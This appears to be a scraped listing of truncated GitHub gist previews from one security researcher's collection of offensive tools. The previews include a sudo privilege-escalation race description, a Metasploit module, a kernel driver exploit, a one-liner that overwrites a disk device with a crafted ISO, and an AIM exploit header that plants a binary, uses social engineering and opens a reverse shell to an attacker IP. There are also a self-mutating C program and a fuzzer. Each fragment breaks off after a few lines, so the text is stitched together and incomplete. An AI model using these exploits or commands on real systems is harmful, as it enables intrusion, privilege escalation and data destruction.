This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
root@debian-sid-testbed:/home/marshall/ansvif# useradd '#0' | |
root@debian-sid-testbed:/home/marshall/ansvif# cat /etc/passwd | |
root:x:0:0:root:/root:/bin/bash | |
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin | |
bin:x:2:2:bin:/bin:/usr/sbin/nologin | |
sys:x:3:3:sys:/dev:/usr/sbin/nologin | |
sync:x:4:65534:sync:/bin:/bin/sync | |
games:x:5:60:games:/usr/games:/usr/sbin/nologin | |
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin | |
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# oxagast / Marshall Whittaker | |
# | |
# The echo line uses sudoers file format to allow for everyone to | |
# use the root account and writes it to proc/23423/fd/3 (where | |
# the number is sudo's process. If you have write access to file | |
# descriptor 3 it gives you root! | |
# Cavets: sudo must be running asking for a password at the time. | |
# you must have write permission to 3. | |
# | |
# Race condition between when getting the uid of sudo and the |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## | |
# This module requires Metasploit: https://metasploit.com/download | |
# Current source: https://github.com/rapid7/metasploit-framework | |
## | |
require 'msf/base/sessions/scriptable' | |
require 'msf/base' | |
class MetasploitModule < Msf::Auxiliary | |
include Msf::Exploit::Remote::Tcp | |
include Msf::Auxiliary::Report |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# | |
# ./makeitrain.sh bitcoin-qt.crashdump.core | |
# __ _ _ __ ___ __ ____ ____ | |
# / ( \/ )/ _\ / __)/ _\/ ___(_ ) | |
# ( O ) (/ ( (_ / \___ \ )( | |
# \__(_/\_\_/\_/\___\_/\_(____/(__) | |
# | |
# Donations: | |
# btc: 34fDhMUkvGVr1s2jQvhwmBfw1xqjstrLed |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/perl | |
use strict; | |
use Cwd qw(); | |
my $path = Cwd::cwd(); | |
if ( $path !~ m/metasploit/ ) { | |
print("err: Your current working directory must be metasploit's.\n"); | |
exit(1); | |
} | |
print("autopreter by oxagast\n"); | |
if ( $#ARGV < 1 ) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
genisoimage -V "AAAAAAAA" -o dos.iso /etc/passwd && dd if=dos.iso | sed -e 's/AAAAAAAA/%n%n%n%n/g' | dd of=/dev/sdb1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* */ | |
/* gcc drm_i915_ktsploit.c -o kt -ldrm -I/usr/include/libdrm */ | |
/* exploit by oxagast */ | |
/* */ | |
//Jun 17 01:22:05 likon kernel: [ 1788.600973] BUG: unable to handle kernel NULL pointer dereference at 0000000000000010 | |
//Jun 17 01:22:05 likon kernel: [ 1788.600982] IP: __sg_alloc_table_from_pages+0xe4/0x1f0 | |
//Jun 17 01:22:05 likon kernel: [ 1788.600984] PGD 0 P4D 0 | |
//Jun 17 01:22:05 likon kernel: [ 1788.600987] Oops: 0000 [#3] SMP PTI | |
//Jun 17 01:22:05 likon kernel: [ 1788.600988] Modules linked in: rfcomm appletalk ipx p8023 psnap p8022 llc pci_stub vboxpci(OE) vboxnetadp(OE) vboxnetflt(OE) vboxdrv(OE) snd_hrtimer ccm cmac bnep binfmt_misc arc4 iwlmvm mac80211 hid_multitouch hid_sensor_magn_3d hid_sensor_accel_3d hid_sensor_rotation hid_sensor_incl_3d hid_sensor_als ir_lirc_codec lirc_dev hid_sensor_gyro_3d rtl2832_sdr hid_sensor_trigger industrialio_t |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
### AOL Instant Messenger 8.0.1.5 (Jul 2013) Exploit Windows XP/7 tested and working. | |
### Leverages binary file planting to My Documents via AIMs advertisement code. | |
### Little social engineering built in using javascript to try to get them to run the AIM_Install.exe. | |
### Starts a reverse shell back to your handler on 192.168.2.5:443 by default. | |
### Marshall Whittaker | |
ATTACKER="192.168.2.10"; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#define __NULLHOLDER | |
#define __START | |
/* oxagast */ | |
/* self output metamorphic c code */ | |
/* gcc myself.c -o me && cat myself.c >> me */ | |
/* ./me && md5sum ./me && sleep 1 && ./me && md5sum ./me */ | |
/* d4c6f41bace586e876f31d8d5032bd2e ./me */ | |
/* 9c80c85a49721a1700e0ac2f594bbf86 ./me */ | |
#include <stdio.h> | |
#include <stdlib.h> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# bermise_fuzz | |
# oxagast | |
mupr="64"; | |
syslog_crashes=$(grep "traps:\|segfault" /var/log/syslog -c); | |
binname="$1"; | |
binshort=$(echo $binname | awk -F "/" '{print $NF}') | |
echo fuzzing $binname; | |
randchars=1; |